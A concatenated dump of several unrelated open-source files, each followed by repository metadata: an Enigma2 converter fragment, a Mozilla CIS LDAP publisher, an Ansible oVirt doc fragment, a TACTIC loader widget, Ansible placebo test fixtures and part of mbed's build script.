ret += self.getIPTVProvider(self.refstr)
else:
ret += self.getIPTVProvider(refstr)
else:
if self.ref:
ret += self.getProviderName(self.ref)
else:
if ref:
ret += self.getProviderName(ref)
else:
ret += info.getInfoString(iServiceInformation.sProvider) or ''
elif f == 'R': # %R - Reference
if self.refstr:
ret += self.refstr
else:
ret += refstr
elif f == 'S': # %S - Satellite
if self.isStream:
ret += _("Internet")
else:
if self.ref:
ret += self.getSatelliteName(self.ref)
else:
ret += self.getSatelliteName(ref or eServiceReference(info.getInfoString(iServiceInformation.sServiceref)))
elif f == 'A': # %A - AllRef
tmpref = self.getReferenceType(refstr, ref)
if 'Bouquet' in tmpref or 'Satellit' in tmpref or 'Provider' in tmpref:
ret += ' '
elif '%3a' in tmpref:
ret += ':'.join(refstr.split(':')[:10])
else:
ret += tmpref
elif f in 'TtsFfiOMpYroclhmgbe':
if self.ref:
ret += self.getTransponderInfo(self.info, self.ref, f)
else:
ret += self.getTransponderInfo(info, ref, f)
ret += line[1:]
return '%s'%(ret.replace('N/A', '').strip())
text = property(getText)
def neededChange(self):
if self.what:
Converter.changed(self, self.what)
self.what = None
def forceChanged(self, what):
if what == True:
self.refstr = self.isStream = self.ref = self.info = self.tpdata = None
Converter.changed(self, (self.CHANGED_ALL,))
self.what = None
def changed(self, what):
if what[0] != self.CHANGED_SPECIFIC or what[1] in (iPlayableService.evStart,):
self.refstr = self.isStream = self.ref = self.info = self.tpdata = None
if self.type in (self.NUMBER,self.BOUQUET) or \
(self.type == self.FORMAT and ('%n' in self.sfmt or '%B' in self.sfmt)):
self.what = what
self.Timer.start(200, True)
else:
Converter.changed(self, what)
| gpl-2.0 | -7,542,504,310,261,494,000 | 34.158779 | 184 | 0.62747 | false |
mozilla-iam/cis | python-modules/cis_publisher/cis_publisher/ldap.py | 1 | 2591 | import cis_profile
import cis_publisher
import boto3
import botocore
import logging
import lzma
import json
from traceback import format_exc
logger = logging.getLogger(__name__)
class LDAPPublisher:
def __init__(self):
self.secret_manager = cis_publisher.secret.Manager()
def publish(self, user_ids=None):
"""
Glue to create or fetch cis_profile.User profiles for this publisher
        Then pass everything over to the Publisher class
        @user_ids: list of str - user ids to publish. If None, ALL profiles are sent.
"""
logger.info("Starting LDAP Publisher")
profiles_xz = self.fetch_from_s3()
# If there are memory issues here, use lzma.LZMADecompressor() instead
raw = lzma.decompress(profiles_xz)
profiles_json = json.loads(raw)
# Free some memory
del profiles_xz
del raw
profiles = []
logger.info("Processing {} profiles".format(len(profiles_json)))
for p in profiles_json:
str_p = json.dumps(profiles_json[p])
if (user_ids is None) or (profiles_json[p]["user_id"]["value"] in user_ids):
profiles.append(cis_profile.User(user_structure_json=str_p))
logger.info("Will publish {} profiles".format(len(profiles)))
publisher = cis_publisher.Publish(profiles, publisher_name="ldap", login_method="ad")
failures = []
try:
publisher.filter_known_cis_users()
failures = publisher.post_all(user_ids=user_ids)
except Exception as e:
logger.error("Failed to post_all() LDAP profiles. Trace: {}".format(format_exc()))
raise e
if len(failures) > 0:
logger.error("Failed to post {} profiles: {}".format(len(failures), failures))
def fetch_from_s3(self):
"""
Fetches xz json data from S3 (ie ldap_blah.json.xz)
Returns the xz bytestream
"""
bucket = self.secret_manager.secret("bucket")
bucket_key = self.secret_manager.secret("bucket_key")
logger.info("Retrieving all LDAP profiles from S3 {}/{}".format(bucket, bucket_key))
s3 = boto3.client("s3")
data = None
try:
response = s3.get_object(Bucket=bucket, Key=bucket_key)
data = response["Body"].read()
except botocore.exceptions.ClientError as e:
logger.error("Failed to get LDAP S3 file from {}/{} trace: {}".format(bucket, bucket_key, format_exc()))
raise e
return data
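# Illustrative usage sketch (added example; the entry point and the user-id format
# shown here are assumptions, not part of this module):
#
#   publisher = LDAPPublisher()
#   publisher.publish()                                   # publish every LDAP profile in S3
#   publisher.publish(user_ids=["ad|example-LDAP|jdoe"])  # or only a chosen subset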
| mpl-2.0 | 6,481,470,480,269,489,000 | 36.014286 | 116 | 0.612891 | false |
KohlsTechnology/ansible | lib/ansible/utils/module_docs_fragments/ovirt_facts.py | 7 | 3242 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
class ModuleDocFragment(object):
# facts standard oVirt documentation fragment
DOCUMENTATION = '''
options:
fetch_nested:
description:
- "If I(True) the module will fetch additional data from the API."
- "It will fetch IDs of the VMs disks, snapshots, etc. User can configure to fetch other
attributes of the nested entities by specifying C(nested_attributes)."
version_added: "2.3"
nested_attributes:
description:
- "Specifies list of the attributes which should be fetched from the API."
- "This parameter apply only when C(fetch_nested) is I(true)."
version_added: "2.3"
auth:
required: True
description:
- "Dictionary with values needed to create HTTP/HTTPS connection to oVirt:"
- C(username)[I(required)] - The name of the user, something like I(admin@internal).
Default value is set by I(OVIRT_USERNAME) environment variable.
- "C(password)[I(required)] - The password of the user. Default value is set by I(OVIRT_PASSWORD) environment variable."
- "C(url)[I(required)] - A string containing the base URL of the server, usually
something like `I(https://server.example.com/ovirt-engine/api)`. Default value is set by I(OVIRT_URL) environment variable."
- "C(token) - Token to be used instead of login with username/password. Default value is set by I(OVIRT_TOKEN) environment variable."
- "C(insecure) - A boolean flag that indicates if the server TLS
certificate and host name should be checked."
- "C(ca_file) - A PEM file containing the trusted CA certificates. The
certificate presented by the server will be verified using these CA
certificates. If `C(ca_file)` parameter is not set, system wide
CA certificate store is used. Default value is set by I(OVIRT_CAFILE) environment variable."
- "C(kerberos) - A boolean flag indicating if Kerberos authentication
should be used instead of the default basic authentication."
- "C(headers) - Dictionary of HTTP headers to be added to each API call."
requirements:
- python >= 2.7
- ovirt-engine-sdk-python >= 4.2.4
notes:
- "In order to use this module you have to install oVirt Python SDK.
To ensure it's installed with correct version you can create the following task:
pip: name=ovirt-engine-sdk-python version=4.2.4"
'''
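# Illustrative task snippet (added example; the module name below is hypothetical and
# only shows how the C(auth) dictionary documented above is typically filled in):
#
#   - my_ovirt_facts_module:
#       auth:
#         url: https://engine.example.com/ovirt-engine/api
#         username: admin@internal
#         password: "{{ engine_password }}"
#         ca_file: /etc/pki/ovirt-engine/ca.pem
#       fetch_nested: true
#       nested_attributes:
#         - name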
| gpl-3.0 | 1,827,179,313,049,713,400 | 49.65625 | 145 | 0.676743 | false |
sadanandb/pmt | src/tactic/ui/cgapp/loader_wdg.py | 6 | 6041 | ###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['CGAppLoaderWdg','IntrospectWdg']
from pyasm.common import Xml, Container
from pyasm.web import Widget, DivWdg, HtmlElement, SpanWdg, WebContainer, Table
from pyasm.widget import SelectWdg, FilterSelectWdg, WidgetConfig, HiddenWdg, IconWdg
from tactic.ui.common import BaseRefreshWdg
from tactic.ui.widget import ActionButtonWdg
#from connection_select_wdg import ConnectionSelectWdg
class CGAppLoaderWdg(BaseRefreshWdg):
'''Main loader class for CG apps'''
def get_args_keys(my):
'''external settings which populate the widget'''
return {
'view': 'view that this widget is making use of',
'search_type': 'search type',
'load_options_class': 'custom load options class name',
'load_script': 'custom load script',
'load_script_path': 'custom load script path',
}
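    # Illustrative construction (added note; argument values are assumptions, not defaults):
    #   CGAppLoaderWdg(view='load', search_type='prod/asset',
    #                  load_script_path='cgapp/load_asset')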
def init(my):
my.view = my.kwargs.get('view')
my.search_type = my.kwargs.get('search_type')
my.load_options_class = my.kwargs.get('load_options_class')
my.load_script = my.kwargs.get('load_script')
my.load_script_path = my.kwargs.get('load_script_path')
my.state = Container.get_full_dict("global_state")
def get_display(my):
# specially made for "load" view
if not my.view.endswith("load"):
return DivWdg()
widget = Widget()
# first use
filter_top = DivWdg(css="maq_search_bar")
filter_top.add_color("background", "background2", -15)
# so dg_table.search_cbk will obtain values from this widget
filter_top.add_class('spt_table_search')
filter_top.add_style("padding: 3px")
# this is used by get_process() in LoaderWdg
filter_top.add(HiddenWdg('prefix', 'view_action_option'))
for name, value in my.kwargs.items():
filter_top.set_attr("spt_%s" % name, value)
from tactic.ui.cgapp import SObjectLoadWdg, LoaderButtonWdg, LoaderElementWdg, IntrospectWdg
# this contains the process filter and load options
sobject_load = SObjectLoadWdg(search_type=my.search_type, load_options_class = my.load_options_class)
filter_top.add(sobject_load)
# set the process
#class foo:
# def get_value(my):
# return "texture"
#Container.put("process_filter", foo())
filter_top.add( HtmlElement.br() )
table = Table()
table.add_class('spt_action_wdg')
table.set_max_width()
td = table.add_cell()
# create the loader button
button = LoaderButtonWdg()
# -------------
# test an event mechanism
event_name = '%s|load_snapshot' % my.search_type
#event_name = 'load_snapshot'
# get triggers with this event
from pyasm.search import Search
search = Search("config/client_trigger")
search.add_filter("event", event_name)
triggers = search.get_sobjects()
if triggers:
for trigger in triggers:
#callback = trigger.get_value("custom_script_code")
callback = trigger.get_value("callback")
event_script = '''
spt.app_busy.show("Loading ...", "Loading selected [%s] in to session");
var script = spt.CustomProject.get_script_by_path("%s");
bvr['script'] = script;
spt.CustomProject.exec_custom_script(evt, bvr);
spt.app_busy.hide();
''' % (my.search_type, callback)
loader_script = '''spt.named_events.fire_event('%s', {})''' % event_name
table.add_behavior( {
'type': 'listen',
'event_name': event_name,
'cbjs_action': event_script
} )
# test a passed in script path
elif my.load_script_path:
# an event is called
event_name = 'load_snapshot'
            event_script = '''var script = spt.CustomProject.get_script_by_path("%s");spt.CustomProject.exec_script(script)''' % my.load_script_path
loader_script = '''spt.named_events.fire_event('%s', {})''' % event_name
table.add_behavior( {
'type': 'listen',
'event_name': event_name,
'cbjs_action': event_script
} )
# end test
# ---------------
elif my.load_script:
loader_script = my.load_script
else:
loader_script = LoaderElementWdg.get_load_script(my.search_type)
#print LoaderElementWdg.get_load_script(my.search_type)
# add the introspect button
introspect_button = IntrospectWdg()
introspect_button.add_style('float: left')
introspect_button.add_style('margin-bottom: 6px')
td.add(introspect_button)
# to be attached
smart_menu = LoaderElementWdg.get_smart_menu(my.search_type)
button.set_load_script(loader_script)
button.set_smart_menu(smart_menu)
td.add(button)
td.add_style('text-align','right')
td.add_style('padding-right', '40px')
widget.add(filter_top)
widget.add( HtmlElement.br() )
widget.add(table)
return widget
class IntrospectWdg(ActionButtonWdg):
'''a widget that does introspection to analyze/update what
assets(versions) are loaded in the session of the app'''
def __init__(my):
super(IntrospectWdg, my).__init__(title='Introspect', tip='Introspect the current session')
my.add_behavior({'type': "click", 'cbjs_action': "introspect(bvr)"})
| epl-1.0 | -4,508,145,218,076,429,300 | 32.748603 | 148 | 0.584506 | false |
tumbl3w33d/ansible | test/units/utils/amazon_placebo_fixtures.py | 13 | 6932 | from __future__ import absolute_import, division, print_function
__metaclass__ = type
import errno
import os
import time
import mock
import pytest
boto3 = pytest.importorskip("boto3")
botocore = pytest.importorskip("botocore")
placebo = pytest.importorskip("placebo")
"""
Using Placebo to test modules using boto3:
This is an example test, using the placeboify fixture to test that a module
will fail if resources it depends on don't exist.
> from placebo_fixtures import placeboify, scratch_vpc
>
> def test_create_with_nonexistent_launch_config(placeboify):
> connection = placeboify.client('autoscaling')
> module = FakeModule('test-asg-created', None, min_size=0, max_size=0, desired_capacity=0)
> with pytest.raises(FailJSON) as excinfo:
> asg_module.create_autoscaling_group(connection, module)
> .... asserts based on module state/exceptions ....
In more advanced cases, use unrecorded resource fixtures to fill in ARNs/IDs of
things modules depend on, such as:
> def test_create_in_vpc(placeboify, scratch_vpc):
> connection = placeboify.client('autoscaling')
> module = FakeModule(name='test-asg-created',
> min_size=0, max_size=0, desired_capacity=0,
> availability_zones=[s['az'] for s in scratch_vpc['subnets']],
> vpc_zone_identifier=[s['id'] for s in scratch_vpc['subnets']],
> )
> ..... so on and so forth ....
"""
@pytest.fixture
def placeboify(request, monkeypatch):
"""This fixture puts a recording/replaying harness around `boto3_conn`
Placeboify patches the `boto3_conn` function in ec2 module_utils to return
a boto3 session that in recording or replaying mode, depending on the
PLACEBO_RECORD environment variable. Unset PLACEBO_RECORD (the common case
for just running tests) will put placebo in replay mode, set PLACEBO_RECORD
to any value to turn off replay & operate on real AWS resources.
The recorded sessions are stored in the test file's directory, under the
namespace `placebo_recordings/{testfile name}/{test function name}` to
distinguish them.
"""
session = boto3.Session(region_name='us-west-2')
recordings_path = os.path.join(
request.fspath.dirname,
'placebo_recordings',
request.fspath.basename.replace('.py', ''),
request.function.__name__
# remove the test_ prefix from the function & file name
).replace('test_', '')
if not os.getenv('PLACEBO_RECORD'):
if not os.path.isdir(recordings_path):
raise NotImplementedError('Missing Placebo recordings in directory: %s' % recordings_path)
else:
try:
# make sure the directory for placebo test recordings is available
os.makedirs(recordings_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
pill = placebo.attach(session, data_path=recordings_path)
if os.getenv('PLACEBO_RECORD'):
pill.record()
else:
pill.playback()
def boto3_middleman_connection(module, conn_type, resource, region='us-west-2', **kwargs):
if conn_type != 'client':
# TODO support resource-based connections
raise ValueError('Mocker only supports client, not %s' % conn_type)
return session.client(resource, region_name=region)
import ansible.module_utils.ec2
monkeypatch.setattr(
ansible.module_utils.ec2,
'boto3_conn',
boto3_middleman_connection,
)
yield session
# tear down
pill.stop()
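# Illustrative sketch (added example; the test below is an assumption and ships with no recording):
#
#   def test_describe_regions(placeboify, maybe_sleep):
#       client = placeboify.client('ec2')
#       regions = client.describe_regions()['Regions']
#       assert len(regions) > 0
#
# Run once with PLACEBO_RECORD=1 against real AWS credentials to capture the JSON
# recordings, then unset it so later runs replay them offline.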
@pytest.fixture(scope='module')
def basic_launch_config():
"""Create an EC2 launch config whose creation *is not* recorded and return its name
This fixture is module-scoped, since launch configs are immutable and this
can be reused for many tests.
"""
if not os.getenv('PLACEBO_RECORD'):
yield 'pytest_basic_lc'
return
# use a *non recording* session to make the launch config
# since that's a prereq of the ec2_asg module, and isn't what
# we're testing.
asg = boto3.client('autoscaling')
asg.create_launch_configuration(
LaunchConfigurationName='pytest_basic_lc',
ImageId='ami-9be6f38c', # Amazon Linux 2016.09 us-east-1 AMI, can be any valid AMI
SecurityGroups=[],
UserData='#!/bin/bash\necho hello world',
InstanceType='t2.micro',
InstanceMonitoring={'Enabled': False},
AssociatePublicIpAddress=True
)
yield 'pytest_basic_lc'
try:
asg.delete_launch_configuration(LaunchConfigurationName='pytest_basic_lc')
except botocore.exceptions.ClientError as e:
if 'not found' in e.message:
return
raise
@pytest.fixture(scope='module')
def scratch_vpc():
if not os.getenv('PLACEBO_RECORD'):
yield {
'vpc_id': 'vpc-123456',
'cidr_range': '10.0.0.0/16',
'subnets': [
{
'id': 'subnet-123456',
'az': 'us-east-1d',
},
{
'id': 'subnet-654321',
'az': 'us-east-1e',
},
]
}
return
# use a *non recording* session to make the base VPC and subnets
ec2 = boto3.client('ec2')
vpc_resp = ec2.create_vpc(
CidrBlock='10.0.0.0/16',
AmazonProvidedIpv6CidrBlock=False,
)
subnets = (
ec2.create_subnet(
VpcId=vpc_resp['Vpc']['VpcId'],
CidrBlock='10.0.0.0/24',
),
ec2.create_subnet(
VpcId=vpc_resp['Vpc']['VpcId'],
CidrBlock='10.0.1.0/24',
)
)
time.sleep(3)
yield {
'vpc_id': vpc_resp['Vpc']['VpcId'],
'cidr_range': '10.0.0.0/16',
'subnets': [
{
'id': s['Subnet']['SubnetId'],
'az': s['Subnet']['AvailabilityZone'],
} for s in subnets
]
}
try:
for s in subnets:
try:
ec2.delete_subnet(SubnetId=s['Subnet']['SubnetId'])
except botocore.exceptions.ClientError as e:
if 'not found' in e.message:
continue
raise
ec2.delete_vpc(VpcId=vpc_resp['Vpc']['VpcId'])
except botocore.exceptions.ClientError as e:
if 'not found' in e.message:
return
raise
@pytest.fixture(scope='module')
def maybe_sleep():
"""If placebo is reading saved sessions, make sleep always take 0 seconds.
AWS modules often perform polling or retries, but when using recorded
sessions there's no reason to wait. We can still exercise retry and other
code paths without waiting for wall-clock time to pass."""
if not os.getenv('PLACEBO_RECORD'):
p = mock.patch('time.sleep', return_value=None)
p.start()
yield
p.stop()
else:
yield
| gpl-3.0 | -5,258,268,011,027,281,000 | 31.544601 | 102 | 0.613964 | false |
hjjeon0608/mbed_for_W7500P | workspace_tools/build_api.py | 30 | 22655 | """
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import tempfile
import colorama
from types import ListType
from shutil import rmtree
from os.path import join, exists, basename
from workspace_tools.utils import mkdir, run_cmd, run_cmd_ext
from workspace_tools.paths import MBED_TARGETS_PATH, MBED_LIBRARIES, MBED_API, MBED_HAL, MBED_COMMON
from workspace_tools.targets import TARGET_NAMES, TARGET_MAP
from workspace_tools.libraries import Library
from workspace_tools.toolchains import TOOLCHAIN_CLASSES
from jinja2 import FileSystemLoader
from jinja2.environment import Environment
def build_project(src_path, build_path, target, toolchain_name,
libraries_paths=None, options=None, linker_script=None,
clean=False, notify=None, verbose=False, name=None, macros=None, inc_dirs=None, jobs=1, silent=False):
""" This function builds project. Project can be for example one test / UT
"""
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, notify, macros, silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
src_paths = [src_path] if type(src_path) != ListType else src_path
# We need to remove all paths which are repeated to avoid
# multiple compilations and linking with the same objects
src_paths = [src_paths[0]] + list(set(src_paths[1:]))
PROJECT_BASENAME = basename(src_paths[0])
if name is None:
# We will use default project name based on project folder name
name = PROJECT_BASENAME
toolchain.info("Building project %s (%s, %s)" % (PROJECT_BASENAME.upper(), target.name, toolchain_name))
else:
        # User used a custom global project name to have the same name for the built output
toolchain.info("Building project %s to %s (%s, %s)" % (PROJECT_BASENAME.upper(), name, target.name, toolchain_name))
# Scan src_path and libraries_paths for resources
resources = toolchain.scan_resources(src_paths[0])
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path))
if libraries_paths is not None:
src_paths.extend(libraries_paths)
for path in libraries_paths:
resources.add(toolchain.scan_resources(path))
if linker_script is not None:
resources.linker_script = linker_script
# Build Directory
if clean:
if exists(build_path):
rmtree(build_path)
mkdir(build_path)
# We need to add if necessary additional include directories
if inc_dirs:
if type(inc_dirs) == ListType:
resources.inc_dirs.extend(inc_dirs)
else:
resources.inc_dirs.append(inc_dirs)
# Compile Sources
for path in src_paths:
src = toolchain.scan_resources(path)
objects = toolchain.compile_sources(src, build_path, resources.inc_dirs)
resources.objects.extend(objects)
# Link Program
return toolchain.link_program(resources, build_path, name)
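# Minimal usage sketch (an assumption, not part of the original module): a
# caller typically resolves a target from TARGET_MAP and points build_project
# at a source tree and an output directory. The paths and target name below
# are placeholders.
def _example_build_project():
    target = TARGET_MAP["LPC1768"]
    return build_project("source", "build", target, "GCC_ARM",
                         clean=True, verbose=False, jobs=2)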
def build_library(src_paths, build_path, target, toolchain_name,
dependencies_paths=None, options=None, name=None, clean=False,
notify=None, verbose=False, macros=None, inc_dirs=None, inc_dirs_ext=None, jobs=1, silent=False):
""" src_path: the path of the source directory
build_path: the path of the build directory
target: ['LPC1768', 'LPC11U24', 'LPC2368']
toolchain: ['ARM', 'uARM', 'GCC_ARM', 'GCC_CS', 'GCC_CR']
library_paths: List of paths to additional libraries
clean: Rebuild everything if True
notify: Notify function for logs
verbose: Write the actual tools command lines if True
inc_dirs: additional include directories which should be included in build
inc_dirs_ext: additional include directories which should be copied to library directory
"""
if type(src_paths) != ListType:
src_paths = [src_paths]
for src_path in src_paths:
if not exists(src_path):
raise Exception("The library source folder does not exist: %s", src_path)
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify, silent=silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# The first path will give the name to the library
name = basename(src_paths[0])
toolchain.info("Building library %s (%s, %s)" % (name.upper(), target.name, toolchain_name))
# Scan Resources
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
# Add extra include directories / files which are required by library
# This files usually are not in the same directory as source files so
# previous scan will not include them
if inc_dirs_ext is not None:
for inc_ext in inc_dirs_ext:
resources.append(toolchain.scan_resources(inc_ext))
# Dependencies Include Paths
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
if inc_dirs:
dependencies_include_dir.extend(inc_dirs)
# Create the desired build directory structure
bin_path = join(build_path, toolchain.obj_path)
mkdir(bin_path)
tmp_path = join(build_path, '.temp', toolchain.obj_path)
mkdir(tmp_path)
# Copy Headers
for resource in resources:
toolchain.copy_files(resource.headers, build_path, rel_path=resource.base_path)
dependencies_include_dir.extend(toolchain.scan_resources(build_path).inc_dirs)
# Compile Sources
objects = []
for resource in resources:
objects.extend(toolchain.compile_sources(resource, tmp_path, dependencies_include_dir))
toolchain.build_library(objects, bin_path, name)
def build_lib(lib_id, target, toolchain, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1, silent=False):
""" Wrapper for build_library function.
Function builds library in proper directory using all dependencies and macros defined by user.
"""
lib = Library(lib_id)
if lib.is_supported(target, toolchain):
# We need to combine macros from parameter list with macros from library definition
MACROS = lib.macros if lib.macros else []
if macros:
MACROS.extend(macros)
build_library(lib.source_dir, lib.build_dir, target, toolchain, lib.dependencies, options,
verbose=verbose,
silent=silent,
clean=clean,
macros=MACROS,
notify=notify,
inc_dirs=lib.inc_dirs,
inc_dirs_ext=lib.inc_dirs_ext,
jobs=jobs)
else:
print 'Library "%s" is not yet supported on target %s with toolchain %s' % (lib_id, target.name, toolchain)
# We do have unique legacy conventions about how we build and package the mbed library
def build_mbed_libs(target, toolchain_name, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1, silent=False):
""" Function returns True is library was built and false if building was skipped """
# Check toolchain support
if toolchain_name not in target.supported_toolchains:
supported_toolchains_text = ", ".join(target.supported_toolchains)
print '%s target is not yet supported by toolchain %s' % (target.name, toolchain_name)
print '%s target supports %s toolchain%s' % (target.name, supported_toolchains_text, 's' if len(target.supported_toolchains) > 1 else '')
return False
# Toolchain
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify, silent=silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# Source and Build Paths
BUILD_TARGET = join(MBED_LIBRARIES, "TARGET_" + target.name)
BUILD_TOOLCHAIN = join(BUILD_TARGET, "TOOLCHAIN_" + toolchain.name)
mkdir(BUILD_TOOLCHAIN)
TMP_PATH = join(MBED_LIBRARIES, '.temp', toolchain.obj_path)
mkdir(TMP_PATH)
# CMSIS
toolchain.info("Building library %s (%s, %s)"% ('CMSIS', target.name, toolchain_name))
cmsis_src = join(MBED_TARGETS_PATH, "cmsis")
resources = toolchain.scan_resources(cmsis_src)
toolchain.copy_files(resources.headers, BUILD_TARGET)
toolchain.copy_files(resources.linker_script, BUILD_TOOLCHAIN)
toolchain.copy_files(resources.bin_files, BUILD_TOOLCHAIN)
objects = toolchain.compile_sources(resources, TMP_PATH)
toolchain.copy_files(objects, BUILD_TOOLCHAIN)
# mbed
toolchain.info("Building library %s (%s, %s)" % ('MBED', target.name, toolchain_name))
# Common Headers
toolchain.copy_files(toolchain.scan_resources(MBED_API).headers, MBED_LIBRARIES)
toolchain.copy_files(toolchain.scan_resources(MBED_HAL).headers, MBED_LIBRARIES)
# Target specific sources
HAL_SRC = join(MBED_TARGETS_PATH, "hal")
hal_implementation = toolchain.scan_resources(HAL_SRC)
toolchain.copy_files(hal_implementation.headers + hal_implementation.hex_files + hal_implementation.libraries, BUILD_TARGET, HAL_SRC)
incdirs = toolchain.scan_resources(BUILD_TARGET).inc_dirs
objects = toolchain.compile_sources(hal_implementation, TMP_PATH, [MBED_LIBRARIES] + incdirs)
# Common Sources
mbed_resources = toolchain.scan_resources(MBED_COMMON)
objects += toolchain.compile_sources(mbed_resources, TMP_PATH, [MBED_LIBRARIES] + incdirs)
# A number of compiled files need to be copied as objects as opposed to
# being part of the mbed library, for reasons that have to do with the way
    # the linker searches for symbols in archives. These are:
# - retarget.o: to make sure that the C standard lib symbols get overridden
# - board.o: mbed_die is weak
# - mbed_overrides.o: this contains platform overrides of various weak SDK functions
separate_names, separate_objects = ['retarget.o', 'board.o', 'mbed_overrides.o'], []
for o in objects:
for name in separate_names:
if o.endswith(name):
separate_objects.append(o)
for o in separate_objects:
objects.remove(o)
toolchain.build_library(objects, BUILD_TOOLCHAIN, "mbed")
for o in separate_objects:
toolchain.copy_files(o, BUILD_TOOLCHAIN)
return True
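# Short usage sketch (an assumption, not part of the original module): the
# bundled mbed library is usually rebuilt once per target/toolchain pair
# before any user project is linked against it.
def _example_build_mbed_libs():
    target = TARGET_MAP["LPC1768"]
    if build_mbed_libs(target, "GCC_ARM", clean=True, jobs=2):
        return "mbed library rebuilt for %s" % target.name
    return "toolchain not supported for this target"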
def get_unique_supported_toolchains():
""" Get list of all unique toolchains supported by targets """
unique_supported_toolchains = []
for target in TARGET_NAMES:
for toolchain in TARGET_MAP[target].supported_toolchains:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
return unique_supported_toolchains
def mcu_toolchain_matrix(verbose_html=False, platform_filter=None):
""" Shows target map using prettytable """
unique_supported_toolchains = get_unique_supported_toolchains()
from prettytable import PrettyTable # Only use it in this function so building works without extra modules
# All tests status table print
columns = ["Platform"] + unique_supported_toolchains
pt = PrettyTable(["Platform"] + unique_supported_toolchains)
# Align table
for col in columns:
pt.align[col] = "c"
pt.align["Platform"] = "l"
perm_counter = 0
target_counter = 0
for target in sorted(TARGET_NAMES):
if platform_filter is not None:
            # Filter out platforms using regex
if re.search(platform_filter, target) is None:
continue
target_counter += 1
row = [target] # First column is platform name
default_toolchain = TARGET_MAP[target].default_toolchain
for unique_toolchain in unique_supported_toolchains:
text = "-"
if default_toolchain == unique_toolchain:
text = "Default"
perm_counter += 1
elif unique_toolchain in TARGET_MAP[target].supported_toolchains:
text = "Supported"
perm_counter += 1
row.append(text)
pt.add_row(row)
result = pt.get_html_string() if verbose_html else pt.get_string()
result += "\n"
result += "*Default - default on-line compiler\n"
result += "*Supported - supported off-line compiler\n"
result += "\n"
result += "Total platforms: %d\n"% (target_counter)
result += "Total permutations: %d"% (perm_counter)
return result
def get_target_supported_toolchains(target):
""" Returns target supported toolchains list """
return TARGET_MAP[target].supported_toolchains if target in TARGET_MAP else None
def static_analysis_scan(target, toolchain_name, CPPCHECK_CMD, CPPCHECK_MSG_FORMAT, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1):
# Toolchain
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# Source and Build Paths
BUILD_TARGET = join(MBED_LIBRARIES, "TARGET_" + target.name)
BUILD_TOOLCHAIN = join(BUILD_TARGET, "TOOLCHAIN_" + toolchain.name)
mkdir(BUILD_TOOLCHAIN)
TMP_PATH = join(MBED_LIBRARIES, '.temp', toolchain.obj_path)
mkdir(TMP_PATH)
# CMSIS
toolchain.info("Static analysis for %s (%s, %s)" % ('CMSIS', target.name, toolchain_name))
cmsis_src = join(MBED_TARGETS_PATH, "cmsis")
resources = toolchain.scan_resources(cmsis_src)
# Copy files before analysis
toolchain.copy_files(resources.headers, BUILD_TARGET)
toolchain.copy_files(resources.linker_script, BUILD_TOOLCHAIN)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
includes = ["-I%s"% i for i in resources.inc_dirs]
includes.append("-I%s"% str(BUILD_TARGET))
c_sources = " ".join(resources.c_sources)
cpp_sources = " ".join(resources.cpp_sources)
macros = ["-D%s"% s for s in toolchain.get_symbols() + toolchain.macros]
includes = map(str.strip, includes)
macros = map(str.strip, macros)
check_cmd = CPPCHECK_CMD
check_cmd += CPPCHECK_MSG_FORMAT
check_cmd += includes
check_cmd += macros
# We need to pass some params via file to avoid "command line too long in some OSs"
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in c_sources.split())
tmp_file.writelines(line + '\n' for line in cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
_stdout, _stderr, _rc = run_cmd(check_cmd)
if verbose:
print _stdout
print _stderr
# =========================================================================
# MBED
toolchain.info("Static analysis for %s (%s, %s)" % ('MBED', target.name, toolchain_name))
# Common Headers
toolchain.copy_files(toolchain.scan_resources(MBED_API).headers, MBED_LIBRARIES)
toolchain.copy_files(toolchain.scan_resources(MBED_HAL).headers, MBED_LIBRARIES)
# Target specific sources
HAL_SRC = join(MBED_TARGETS_PATH, "hal")
hal_implementation = toolchain.scan_resources(HAL_SRC)
# Copy files before analysis
toolchain.copy_files(hal_implementation.headers + hal_implementation.hex_files, BUILD_TARGET, HAL_SRC)
